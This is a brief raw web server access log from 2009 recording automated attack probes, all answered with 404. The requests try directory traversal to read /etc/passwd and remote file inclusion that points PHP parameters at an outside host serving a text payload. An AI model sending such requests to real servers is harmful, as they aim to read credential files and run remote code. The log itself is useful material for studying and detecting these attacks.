94.136.44.129 - - [13/Nov/2009:22:54:50 -0600] "GET /logs/webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=./../../../../../../../../etc/passwd HTTP/1.1" 404 340 "-""-"
94.136.44.129 - - [13/Nov/2009:22:54:50 -0600] "GET /webmail/lib/emailreader_execute_on_each_page.inc.php?emailreader_ini=./../../../../../../../../etc/passwd HTTP/1.1" 404 335 "-""-"
207.244.223.5 - - [13/Nov/2009:22:55:07 -0600] "GET /logs/access_log.1252886400//setup.php?dir=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 320 "-""Mozilla/5.0"
207.244.223.5 - - [13/Nov/2009:22:55:08 -0600] "GET /logs/access_log.1228262400//vwar/admin/admin.php?vwar_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
207.244.223.5 - - [13/Nov/2009:22:55:41 -0600] "GET /logs/access_log.1238803200//vwar/admin/admin.php?vwar_root=http://bangladesherkhela.com/x1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
